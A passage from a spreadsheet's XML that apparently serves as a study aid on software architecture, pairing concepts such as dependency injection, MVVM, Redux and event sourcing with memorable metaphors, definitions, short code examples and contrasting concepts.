      </c>
      <c r="F652" t="inlineStr">
        <is>
          <t>Java module exports; TypeScript index.ts re-exporting only the public API</t>
        </is>
      </c>
      <c r="G652" t="inlineStr">
        <is>
          <t>Namespace/folder — a folder merely groups files; a boundary additionally enforces WHAT is visible and hides the rest.</t>
        </is>
      </c>
      <c r="H652" t="inlineStr">
        <is>
          <t>Cell membrane — rejected, membranes leak by design.</t>
        </is>
      </c>
      <c r="J652" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K652" t="inlineStr">
        <is>
          <t>Modularity &amp; dependency injection</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" t="n">
        <v>0</v>
      </c>
      <c r="B653" t="inlineStr">
        <is>
          <t>651</t>
        </is>
      </c>
      <c r="C653" t="inlineStr">
        <is>
          <t>Coupling metrics</t>
        </is>
      </c>
      <c r="D653" t="inlineStr">
        <is>
          <t>A trapeze artist wearing ropes: ropes others pull taut on her (Ca) hold her steady; ropes SHE grips outward (Ce) make her sway. Sway fraction = instability.</t>
        </is>
      </c>
      <c r="E653" t="inlineStr">
        <is>
          <t>Dependency counts quantify coupling: afferent Ca (who needs me), efferent Ce (whom I need), instability I = Ce/(Ca+Ce).</t>
        </is>
      </c>
      <c r="F653" t="inlineStr">
        <is>
          <t>I near 0 = stable core lib; I near 1 = top-level app; JDepend/ArchUnit report these</t>
        </is>
      </c>
      <c r="G653" t="inlineStr">
        <is>
          <t>Cohesion — coupling measures dependence BETWEEN modules; cohesion measures belonging-together WITHIN one.</t>
        </is>
      </c>
      <c r="H653" t="inlineStr">
        <is>
          <t>Spiderweb strands — rejected, no in/out direction visible.</t>
        </is>
      </c>
      <c r="J653" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K653" t="inlineStr">
        <is>
          <t>Modularity &amp; dependency injection</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" t="n">
        <v>0</v>
      </c>
      <c r="B654" t="inlineStr">
        <is>
          <t>652</t>
        </is>
      </c>
      <c r="C654" t="inlineStr">
        <is>
          <t>Package by feature vs layer</t>
        </is>
      </c>
      <c r="D654" t="inlineStr">
        <is>
          <t>A hardware store reorganized by project instead of material: the build-a-birdhouse aisle holds its own nails, wood and paint, so one job touches one aisle.</t>
        </is>
      </c>
      <c r="E654" t="inlineStr">
        <is>
          <t>Group code by business capability, not technical layer: feature packages localize change; layer packages scatter every feature across the whole tree.</t>
        </is>
      </c>
      <c r="F654" t="inlineStr">
        <is>
          <t>orders/ (model+api+db together) vs models/, views/, controllers/ each holding a slice of orders</t>
        </is>
      </c>
      <c r="G654" t="inlineStr">
        <is>
          <t>vs layered architecture (64x): layers can still exist INSIDE a feature package; the question is the top-level folder axis</t>
        </is>
      </c>
      <c r="H654" t="inlineStr">
        <is>
          <t>bento box vs cafeteria line</t>
        </is>
      </c>
      <c r="J654" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K654" t="inlineStr">
        <is>
          <t>Modularity &amp; dependency injection</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" t="n">
        <v>0</v>
      </c>
      <c r="B655" t="inlineStr">
        <is>
          <t>653</t>
        </is>
      </c>
      <c r="C655" t="inlineStr">
        <is>
          <t>IoC container</t>
        </is>
      </c>
      <c r="D655" t="inlineStr">
        <is>
          <t>A robotic LEGO butler reads your blueprint at dawn and snaps the entire castle together before you wake — you never touch a single brick yourself.</t>
        </is>
      </c>
      <c r="E655" t="inlineStr">
        <is>
          <t>A framework that reads wiring configuration, builds the whole object graph, and injects dependencies automatically, managing lifetimes.</t>
        </is>
      </c>
      <c r="F655" t="inlineStr">
        <is>
          <t>Spring ApplicationContext; .NET IServiceCollection; Guice Injector</t>
        </is>
      </c>
      <c r="G655" t="inlineStr">
        <is>
          <t>DI the pattern — DI needs no container; 'pure DI' wires by hand in main(). The container merely automates the wiring.</t>
        </is>
      </c>
      <c r="H655" t="inlineStr">
        <is>
          <t>Automated warehouse robots — rejected, LEGO butler links to object graphs.</t>
        </is>
      </c>
      <c r="J655" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K655" t="inlineStr">
        <is>
          <t>Modularity &amp; dependency injection</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" t="n">
        <v>0</v>
      </c>
      <c r="B656" t="inlineStr">
        <is>
          <t>654</t>
        </is>
      </c>
      <c r="C656" t="inlineStr">
        <is>
          <t>Constructor injection</t>
        </is>
      </c>
      <c r="D656" t="inlineStr">
        <is>
          <t>A spaceship that physically cannot launch until every crew member is strapped in at ignition — and the hatch welds itself shut after liftoff (immutability).</t>
        </is>
      </c>
      <c r="E656" t="inlineStr">
        <is>
          <t>Dependencies arrive as constructor parameters, making them mandatory, visible, and enabling immutable, always-valid objects.</t>
        </is>
      </c>
      <c r="F656" t="inlineStr">
        <is>
          <t>constructor(private repo: Repo) {} — compile error if a caller omits it</t>
        </is>
      </c>
      <c r="G656" t="inlineStr">
        <is>
          <t>Setter/field injection — those allow half-initialized objects and hidden requirements; constructor injection fails fast at build time.</t>
        </is>
      </c>
      <c r="H656" t="inlineStr">
        <is>
          <t>Bouncer at the object's birth — rejected as gross but memorable.</t>
        </is>
      </c>
      <c r="J656" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K656" t="inlineStr">
        <is>
          <t>Modularity &amp; dependency injection</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" t="n">
        <v>0</v>
      </c>
      <c r="B657" t="inlineStr">
        <is>
          <t>655</t>
        </is>
      </c>
      <c r="C657" t="inlineStr">
        <is>
          <t>Package cycles</t>
        </is>
      </c>
      <c r="D657" t="inlineStr">
        <is>
          <t>Three mountaineers roped in a closed circle: when one slips, all three dangle together — and no single climber can ever be rescued (released) alone.</t>
        </is>
      </c>
      <c r="E657" t="inlineStr">
        <is>
          <t>Mutual dependencies among packages weld them into one un-reusable, un-releasable lump; keep the dependency graph acyclic (ADP).</t>
        </is>
      </c>
      <c r="F657" t="inlineStr">
        <is>
          <t>A-&gt;B-&gt;C-&gt;A: touching C rebuilds all; fix by extracting an interface package</t>
        </is>
      </c>
      <c r="G657" t="inlineStr">
        <is>
          <t>Class-level circular imports — same disease at file scale; ADP concerns released package/module units.</t>
        </is>
      </c>
      <c r="H657" t="inlineStr">
        <is>
          <t>Ouroboros snakes — rejected, one snake hides that MULTIPLE parties are stuck.</t>
        </is>
      </c>
      <c r="J657" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K657" t="inlineStr">
        <is>
          <t>Modularity &amp; dependency injection</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" t="n">
        <v>0</v>
      </c>
      <c r="B658" t="inlineStr">
        <is>
          <t>656</t>
        </is>
      </c>
      <c r="C658" t="inlineStr">
        <is>
          <t>Plugin architecture</t>
        </is>
      </c>
      <c r="D658" t="inlineStr">
        <is>
          <t>A pegboard power-tool wall: the bare drill body (core) accepts any snap-on head — sander, whisk, saw — sold years later by total strangers.</t>
        </is>
      </c>
      <c r="E658" t="inlineStr">
        <is>
          <t>A minimal core defines extension-point interfaces and discovers plugins at runtime, so features ship and load independently.</t>
        </is>
      </c>
      <c r="F658" t="inlineStr">
        <is>
          <t>VS Code extensions; ESLint plugins; Java ServiceLoader discovery</t>
        </is>
      </c>
      <c r="G658" t="inlineStr">
        <is>
          <t>Library use — the app calls a library; a plugin is called BY the core through the core's own interface (control inverted).</t>
        </is>
      </c>
      <c r="H658" t="inlineStr">
        <is>
          <t>Game console cartridges — rejected, consoles run one cartridge at a time.</t>
        </is>
      </c>
      <c r="J658" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K658" t="inlineStr">
        <is>
          <t>Modularity &amp; dependency injection</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" t="n">
        <v>0</v>
      </c>
      <c r="B659" t="inlineStr">
        <is>
          <t>657</t>
        </is>
      </c>
      <c r="C659" t="inlineStr">
        <is>
          <t>Service locator</t>
        </is>
      </c>
      <c r="D659" t="inlineStr">
        <is>
          <t>Employees sneak to a dusty basement vending machine for their tools: the org chart (constructor) lists no tools at all — until tests find the machine empty and everything jams.</t>
        </is>
      </c>
      <c r="E659" t="inlineStr">
        <is>
          <t>Components fetch dependencies from a global registry — an anti-pattern versus DI because it hides real dependencies and hurts testing.</t>
        </is>
      </c>
      <c r="F659" t="inlineStr">
        <is>
          <t>ServiceLocator.get('mailer') deep inside a method — invisible in any signature</t>
        </is>
      </c>
      <c r="G659" t="inlineStr">
        <is>
          <t>DI container — the container injects from OUTSIDE at composition time; a locator is called from INSIDE, coupling code to the registry.</t>
        </is>
      </c>
      <c r="H659" t="inlineStr">
        <is>
          <t>Junk drawer — rejected, vending machine encodes the global registry API.</t>
        </is>
      </c>
      <c r="J659" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K659" t="inlineStr">
        <is>
          <t>Modularity &amp; dependency injection</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" t="n">
        <v>0</v>
      </c>
      <c r="B660" t="inlineStr">
        <is>
          <t>658</t>
        </is>
      </c>
      <c r="C660" t="inlineStr">
        <is>
          <t>Composition root</t>
        </is>
      </c>
      <c r="D660" t="inlineStr">
        <is>
          <t>One grand florist stand at the app's front door where every bouquet (object graph) is arranged before opening hour — no flowers are ever cut in back offices.</t>
        </is>
      </c>
      <c r="E660" t="inlineStr">
        <is>
          <t>The single place near the entry point where the whole object graph is composed; nothing else news up long-lived collaborators.</t>
        </is>
      </c>
      <c r="F660" t="inlineStr">
        <is>
          <t>main() { app = new App(new PgRepo(cfg), new SmtpMailer(cfg)); app.run(); }</t>
        </is>
      </c>
      <c r="G660" t="inlineStr">
        <is>
          <t>Scattered new()s — the smell it cures; construction knowledge lives in ONE root, not sprinkled through business code.</t>
        </is>
      </c>
      <c r="H660" t="inlineStr">
        <is>
          <t>Mission control room — rejected, florist encodes assembling, not commanding.</t>
        </is>
      </c>
      <c r="J660" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K660" t="inlineStr">
        <is>
          <t>Modularity &amp; dependency injection</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" t="n">
        <v>0</v>
      </c>
      <c r="B661" t="inlineStr">
        <is>
          <t>659</t>
        </is>
      </c>
      <c r="C661" t="inlineStr">
        <is>
          <t>Stable dependencies principle</t>
        </is>
      </c>
      <c r="D661" t="inlineStr">
        <is>
          <t>Hammocks tied to old oaks, never to saplings: swinging sleepers (changing apps) hang off thick trunks (stable cores). Tie an oak to a sapling and both crash down.</t>
        </is>
      </c>
      <c r="E661" t="inlineStr">
        <is>
          <t>Depend in the direction of stability: volatile packages may depend on stable ones, never the reverse.</t>
        </is>
      </c>
      <c r="F661" t="inlineStr">
        <is>
          <t>app (I~0.9) -&gt; utils (I~0.1) fine; core depending on an experimental lib = violation</t>
        </is>
      </c>
      <c r="G661" t="inlineStr">
        <is>
          <t>Stable-abstractions principle — SAP adds that stable packages should also be ABSTRACT; SDP only orders the arrows.</t>
        </is>
      </c>
      <c r="H661" t="inlineStr">
        <is>
          <t>Anchoring yachts to buoys — rejected, buoys are all equally unstable.</t>
        </is>
      </c>
      <c r="J661" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K661" t="inlineStr">
        <is>
          <t>Modularity &amp; dependency injection</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" t="n">
        <v>0</v>
      </c>
      <c r="B662" t="inlineStr">
        <is>
          <t>660</t>
        </is>
      </c>
      <c r="C662" t="inlineStr">
        <is>
          <t>MVC</t>
        </is>
      </c>
      <c r="D662" t="inlineStr">
        <is>
          <t>A puppet theater: the puppet (view) dances on stage, the puppeteer's hands (controller) translate the audience's shouts, the script binder backstage (model) holds the story.</t>
        </is>
      </c>
      <c r="E662" t="inlineStr">
        <is>
          <t>Splits UI into Model (state and logic), View (presentation), Controller (input handling); views render from the model.</t>
        </is>
      </c>
      <c r="F662" t="inlineStr">
        <is>
          <t>Rails: route -&gt; UsersController -&gt; User model -&gt; ERB view</t>
        </is>
      </c>
      <c r="G662" t="inlineStr">
        <is>
          <t>MVP — in MVC the view may read the model directly; in MVP a presenter mediates everything and the view stays passive.</t>
        </is>
      </c>
      <c r="H662" t="inlineStr">
        <is>
          <t>Restaurant waiter/kitchen/menu — reserved: food metaphors used elsewhere.</t>
        </is>
      </c>
      <c r="J662" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K662" t="inlineStr">
        <is>
          <t>UI architectures</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" t="n">
        <v>0</v>
      </c>
      <c r="B663" t="inlineStr">
        <is>
          <t>661</t>
        </is>
      </c>
      <c r="C663" t="inlineStr">
        <is>
          <t>MVP</t>
        </is>
      </c>
      <c r="D663" t="inlineStr">
        <is>
          <t>A ventriloquist (presenter) with a wooden dummy (view): the dummy holds no thoughts of its own, moving its jaw exactly as the hand inside commands.</t>
        </is>
      </c>
      <c r="E663" t="inlineStr">
        <is>
          <t>A presenter takes all input, drives a passive view through an interface, and talks to the model — view and model never meet.</t>
        </is>
      </c>
      <c r="F663" t="inlineStr">
        <is>
          <t>Android pre-ViewModel: LoginPresenter calls LoginView.showError()</t>
        </is>
      </c>
      <c r="G663" t="inlineStr">
        <is>
          <t>MVVM — MVP's presenter calls view methods explicitly; MVVM's viewmodel exposes state and lets data binding do the syncing.</t>
        </is>
      </c>
      <c r="H663" t="inlineStr">
        <is>
          <t>Puppet on strings — rejected, already spent on MVC's stage.</t>
        </is>
      </c>
      <c r="J663" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K663" t="inlineStr">
        <is>
          <t>UI architectures</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" t="n">
        <v>0</v>
      </c>
      <c r="B664" t="inlineStr">
        <is>
          <t>662</t>
        </is>
      </c>
      <c r="C664" t="inlineStr">
        <is>
          <t>MVVM</t>
        </is>
      </c>
      <c r="D664" t="inlineStr">
        <is>
          <t>A mirror-dance studio: the dancer (viewmodel) moves and the mirror (view) matches instantly — neither ever touches the other; the glass (binding) does all the work.</t>
        </is>
      </c>
      <c r="E664" t="inlineStr">
        <is>
          <t>A viewmodel exposes bindable state and commands; a data-binding layer keeps view and viewmodel in sync with no direct references.</t>
        </is>
      </c>
      <c r="F664" t="inlineStr">
        <is>
          <t>WPF, Knockout, Vue: &lt;input v-model='name'&gt; bound to a viewmodel field</t>
        </is>
      </c>
      <c r="G664" t="inlineStr">
        <is>
          <t>MVP — MVVM replaces the presenter's explicit view calls with declarative bindings; the viewmodel never knows the view exists.</t>
        </is>
      </c>
      <c r="H664" t="inlineStr">
        <is>
          <t>Shadow following you — rejected, shadows are one-way, binding is two-way.</t>
        </is>
      </c>
      <c r="J664" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K664" t="inlineStr">
        <is>
          <t>UI architectures</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" t="n">
        <v>0</v>
      </c>
      <c r="B665" t="inlineStr">
        <is>
          <t>663</t>
        </is>
      </c>
      <c r="C665" t="inlineStr">
        <is>
          <t>Two-way data binding</t>
        </is>
      </c>
      <c r="D665" t="inlineStr">
        <is>
          <t>Two buckets on a pulley rope through a window: pour water into either bucket and the rope instantly levels them — sometimes sloshing back and forth mysteriously at 3am.</t>
        </is>
      </c>
      <c r="E665" t="inlineStr">
        <is>
          <t>Framework machinery auto-syncs view widgets and model fields in both directions, at the cost of harder-to-trace update flows.</t>
        </is>
      </c>
      <c r="F665" t="inlineStr">
        <is>
          <t>Angular [(ngModel)]='user.name' — edits flow field&lt;-&gt;input automatically</t>
        </is>
      </c>
      <c r="G665" t="inlineStr">
        <is>
          <t>One-way binding — one-way re-renders the view FROM state only; edits return via explicit events, keeping the flow traceable.</t>
        </is>
      </c>
      <c r="H665" t="inlineStr">
        <is>
          <t>Telepathic twins — rejected, buckets show the sloshing failure mode.</t>
        </is>
      </c>
      <c r="J665" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K665" t="inlineStr">
        <is>
          <t>UI architectures</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" t="n">
        <v>0</v>
      </c>
      <c r="B666" t="inlineStr">
        <is>
          <t>664</t>
        </is>
      </c>
      <c r="C666" t="inlineStr">
        <is>
          <t>Component-based UI</t>
        </is>
      </c>
      <c r="D666" t="inlineStr">
        <is>
          <t>LEGO minifigs each carrying a tiny brain and wardrobe inside: snap a plaza together from figures, then snap one figure into a different set — it still works.</t>
        </is>
      </c>
      <c r="E666" t="inlineStr">
        <is>
          <t>UI built from self-contained components owning their markup, logic, and state, composed into trees like functions.</t>
        </is>
      </c>
      <c r="F666" t="inlineStr">
        <is>
          <t>React: &lt;App&gt;&lt;Header&gt;&lt;SearchBar/&gt;&lt;/Header&gt;&lt;/App&gt;</t>
        </is>
      </c>
      <c r="G666" t="inlineStr">
        <is>
          <t>Template partials — partials share markup only; components also encapsulate behavior and local state.</t>
        </is>
      </c>
      <c r="H666" t="inlineStr">
        <is>
          <t>Modular sofa — rejected, sofa parts hold no behavior.</t>
        </is>
      </c>
      <c r="J666" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K666" t="inlineStr">
        <is>
          <t>UI architectures</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" t="n">
        <v>0</v>
      </c>
      <c r="B667" t="inlineStr">
        <is>
          <t>665</t>
        </is>
      </c>
      <c r="C667" t="inlineStr">
        <is>
          <t>Unidirectional data flow</t>
        </is>
      </c>
      <c r="D667" t="inlineStr">
        <is>
          <t>A one-way water park: state pours down the slide into the views below; riders send wishes back up only via the message-balloon chimney (actions). No swimming upstream.</t>
        </is>
      </c>
      <c r="E667" t="inlineStr">
        <is>
          <t>State flows down as props and changes flow up as events or actions through one loop, making every mutation traceable.</t>
        </is>
      </c>
      <c r="F667" t="inlineStr">
        <is>
          <t>React: props down, onChange callbacks up; the Elm architecture loop</t>
        </is>
      </c>
      <c r="G667" t="inlineStr">
        <is>
          <t>Two-way binding — the very thing it replaces; syncing both ways is convenient but obscures who changed what.</t>
        </is>
      </c>
      <c r="H667" t="inlineStr">
        <is>
          <t>Salmon ladder — rejected, salmon famously DO swim upstream.</t>
        </is>
      </c>
      <c r="J667" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K667" t="inlineStr">
        <is>
          <t>UI architectures</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" t="n">
        <v>0</v>
      </c>
      <c r="B668" t="inlineStr">
        <is>
          <t>666</t>
        </is>
      </c>
      <c r="C668" t="inlineStr">
        <is>
          <t>Flux/Redux</t>
        </is>
      </c>
      <c r="D668" t="inlineStr">
        <is>
          <t>A courtroom for every click: the action files a case (dispatch), the judge-reducer reads old law plus case and pens ONE new law book — the whole town re-reads it.</t>
        </is>
      </c>
      <c r="E668" t="inlineStr">
        <is>
          <t>All state lives in one store; views dispatch actions, pure reducers compute the next state, and views re-render from it.</t>
        </is>
      </c>
      <c r="F668" t="inlineStr">
        <is>
          <t>dispatch({type:'ADD_TODO', text}); reducer: (state, action) =&gt; newState</t>
        </is>
      </c>
      <c r="G668" t="inlineStr">
        <is>
          <t>MVC — many controllers mutate models in place; Redux has one store and immutable transitions through pure functions.</t>
        </is>
      </c>
      <c r="H668" t="inlineStr">
        <is>
          <t>666 as the single all-seeing store — rejected, spooky but mechanism-free.</t>
        </is>
      </c>
      <c r="J668" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K668" t="inlineStr">
        <is>
          <t>UI architectures</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" t="n">
        <v>0</v>
      </c>
      <c r="B669" t="inlineStr">
        <is>
          <t>667</t>
        </is>
      </c>
      <c r="C669" t="inlineStr">
        <is>
          <t>Lifting state up</t>
        </is>
      </c>
      <c r="D669" t="inlineStr">
        <is>
          <t>Two kids fight over one toy, so mom places it on the top shelf: now both must ask her (the common ancestor), and everyone sees the same toy.</t>
        </is>
      </c>
      <c r="E669" t="inlineStr">
        <is>
          <t>When siblings must share state, move it to their closest common ancestor and pass it down, keeping one source of truth.</t>
        </is>
      </c>
      <c r="F669" t="inlineStr">
        <is>
          <t>React: temperature state moved from two inputs into the parent Calculator</t>
        </is>
      </c>
      <c r="G669" t="inlineStr">
        <is>
          <t>Global store — lifting goes only as high as NEEDED; jumping straight to a global store couples everything to it.</t>
        </is>
      </c>
      <c r="H669" t="inlineStr">
        <is>
          <t>Flag raised up a pole — rejected, no sibling conflict shown.</t>
        </is>
      </c>
      <c r="J669" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K669" t="inlineStr">
        <is>
          <t>UI architectures</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" t="n">
        <v>0</v>
      </c>
      <c r="B670" t="inlineStr">
        <is>
          <t>668</t>
        </is>
      </c>
      <c r="C670" t="inlineStr">
        <is>
          <t>Container/presentational split</t>
        </is>
      </c>
      <c r="D670" t="inlineStr">
        <is>
          <t>A restaurant split in two: the kitchen (container) sources and cooks everything; the plating artist (presentational) only arranges whatever lands on the plate.</t>
        </is>
      </c>
      <c r="E670" t="inlineStr">
        <is>
          <t>Container components fetch data and hold logic; presentational components just render props — data and looks kept separate.</t>
        </is>
      </c>
      <c r="F670" t="inlineStr">
        <is>
          <t>UserListContainer fetches, then renders &lt;UserList users={users}/&gt;</t>
        </is>
      </c>
      <c r="G670" t="inlineStr">
        <is>
          <t>Custom hooks — hooks now often replace containers by extracting logic without an extra component layer.</t>
        </is>
      </c>
      <c r="H670" t="inlineStr">
        <is>
          <t>Brain and face — rejected, kitchen/plating shows the data handoff.</t>
        </is>
      </c>
      <c r="J670" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K670" t="inlineStr">
        <is>
          <t>UI architectures</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" t="n">
        <v>0</v>
      </c>
      <c r="B671" t="inlineStr">
        <is>
          <t>669</t>
        </is>
      </c>
      <c r="C671" t="inlineStr">
        <is>
          <t>Humble object</t>
        </is>
      </c>
      <c r="D671" t="inlineStr">
        <is>
          <t>A shy stagehand whose only job is pulling the curtain rope: he makes zero decisions, so nobody ever needs to audition (test) him — the whole play lives elsewhere.</t>
        </is>
      </c>
      <c r="E671" t="inlineStr">
        <is>
          <t>Split hard-to-test boundary code into a thin humble shell and a testable core, pushing all logic out of the untestable part.</t>
        </is>
      </c>
      <c r="F671" t="inlineStr">
        <is>
          <t>View just prints viewmodel fields; all formatting logic unit-tested in the viewmodel</t>
        </is>
      </c>
      <c r="G671" t="inlineStr">
        <is>
          <t>Facade — a facade simplifies a subsystem for callers; a humble object exists to move logic OUT of an untestable edge.</t>
        </is>
      </c>
      <c r="H671" t="inlineStr">
        <is>
          <t>Doorman with no keys — rejected, stagehand ties to UI's stage.</t>
        </is>
      </c>
      <c r="J671" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K671" t="inlineStr">
        <is>
          <t>UI architectures</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" t="n">
        <v>0</v>
      </c>
      <c r="B672" t="inlineStr">
        <is>
          <t>670</t>
        </is>
      </c>
      <c r="C672" t="inlineStr">
        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
      <c r="D672" t="inlineStr">
        <is>
          <t>A town-square bell: the baker rings 'bread's ready!' and walks away; whoever cares comes running. The baker knows no names and waits for no one.</t>
        </is>
      </c>
      <c r="E672" t="inlineStr">
        <is>
          <t>Components communicate by producing and reacting to events rather than calling each other, decoupling senders from receivers in time and knowledge.</t>
        </is>
      </c>
      <c r="F672" t="inlineStr">
        <is>
          <t>OrderPlaced event -&gt; email service, inventory, analytics each react independently</t>
        </is>
      </c>
      <c r="G672" t="inlineStr">
        <is>
          <t>Request/response — a request needs the receiver up NOW and awaits an answer; an event is fire-and-forget to unknown listeners.</t>
        </is>
      </c>
      <c r="H672" t="inlineStr">
        <is>
          <t>Nervous system — rejected, nerves are point-to-point wiring.</t>
        </is>
      </c>
      <c r="J672" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K672" t="inlineStr">
        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" t="n">
        <v>0</v>
      </c>
      <c r="B673" t="inlineStr">
        <is>
          <t>671</t>
        </is>
      </c>
      <c r="C673" t="inlineStr">
        <is>
          <t>Publish/subscribe</t>
        </is>
      </c>
      <c r="D673" t="inlineStr">
        <is>
          <t>Magazine subscriptions: writers mail issues to the 'Gardening' PO box; the postman fans copies out to the subscriber list. Authors never see a single address.</t>
        </is>
      </c>
      <c r="E673" t="inlineStr">
        <is>
          <t>Producers publish to named topics on a broker; subscribers receive by topic — neither side ever knows the other exists.</t>
        </is>
      </c>
      <c r="F673" t="inlineStr">
        <is>
          <t>Kafka topic 'orders'; Redis PUBLISH/SUBSCRIBE; Google Pub/Sub</t>
        </is>
      </c>
      <c r="G673" t="inlineStr">
        <is>
          <t>Observer — observers register directly with the subject object; pub/sub interposes a broker and topic names between the parties.</t>
        </is>
      </c>
      <c r="H673" t="inlineStr">
        <is>
          <t>Radio station — rejected, radio has no per-topic subscription list.</t>
        </is>
      </c>
      <c r="J673" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K673" t="inlineStr">
        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" t="n">
        <v>0</v>
      </c>
      <c r="B674" t="inlineStr">
        <is>
          <t>672</t>
        </is>
      </c>
      <c r="C674" t="inlineStr">
        <is>
          <t>Event notification</t>
        </is>
      </c>
      <c r="D674" t="inlineStr">
        <is>
          <t>A doorbell rings with a note: 'package #42 arrived.' You still have to trudge to the depot and ask what's inside box 42.</t>
        </is>
      </c>
      <c r="E674" t="inlineStr">
        <is>
          <t>Thin events announce that something happened plus an ID; consumers call back to the source for details — small events, but coupled reads.</t>
        </is>
      </c>
      <c r="F674" t="inlineStr">
        <is>
          <t>{event:'OrderPlaced', orderId:42} -&gt; consumer GETs /orders/42 for details</t>
        </is>
      </c>
      <c r="G674" t="inlineStr">
        <is>
          <t>Event-carried state transfer — fat events carry the data along, so no callback query is ever needed.</t>
        </is>
      </c>
      <c r="H674" t="inlineStr">
        <is>
          <t>Pager beeping a code — rejected, doorbell-plus-depot shows the callback.</t>
        </is>
      </c>
      <c r="J674" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K674" t="inlineStr">
        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" t="n">
        <v>0</v>
      </c>
      <c r="B675" t="inlineStr">
        <is>
          <t>673</t>
        </is>
      </c>
      <c r="C675" t="inlineStr">
        <is>
          <t>Event-carried state transfer</t>
        </is>
      </c>
      <c r="D675" t="inlineStr">
        <is>
          <t>The drone drops the WHOLE parcel on your porch, not a claim ticket: your own pantry (local copy) fills up, and you never visit the depot again.</t>
        </is>
      </c>
      <c r="E675" t="inlineStr">
        <is>
          <t>Events carry the full relevant state so consumers keep local copies and never query the source — availability up, duplication and staleness accepted.</t>
        </is>
      </c>
      <c r="F675" t="inlineStr">
        <is>
          <t>{event:'OrderPlaced', order:{id, items, total, address}} consumed into a local table</t>
        </is>
      </c>
      <c r="G675" t="inlineStr">
        <is>
          <t>Event notification — notification sends a pointer (go ask); ECST sends the payload (never ask).</t>
        </is>
      </c>
      <c r="H675" t="inlineStr">
        <is>
          <t>Newspaper with the full story — rejected, parcel pairs with 672's ticket.</t>
        </is>
      </c>
      <c r="J675" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K675" t="inlineStr">
        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" t="n">
        <v>0</v>
      </c>
      <c r="B676" t="inlineStr">
        <is>
          <t>674</t>
        </is>
      </c>
      <c r="C676" t="inlineStr">
        <is>
          <t>Event sourcing</t>
        </is>
      </c>
      <c r="D676" t="inlineStr">
        <is>
          <t>An accountant's ink ledger: nobody erases, ever; a mistake gets a correcting line, and today's balance is re-summed from page one whenever anyone asks.</t>
        </is>
      </c>
      <c r="E676" t="inlineStr">
        <is>
          <t>Persist every state change as an immutable event; current state is derived by replaying the log, which is the system of record.</t>
        </is>
      </c>
      <c r="F676" t="inlineStr">
        <is>
          <t>Account balance = fold(Deposited, Withdrawn...); snapshots speed up replay</t>
        </is>
      </c>
      <c r="G676" t="inlineStr">
        <is>
          <t>Audit log — an audit log is a side record; in event sourcing the log IS the primary data and state is just a projection.</t>
        </is>
      </c>
      <c r="H676" t="inlineStr">
        <is>
          <t>Git commit history — good but overused; ledger is more visceral.</t>
        </is>
      </c>
      <c r="J676" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K676" t="inlineStr">
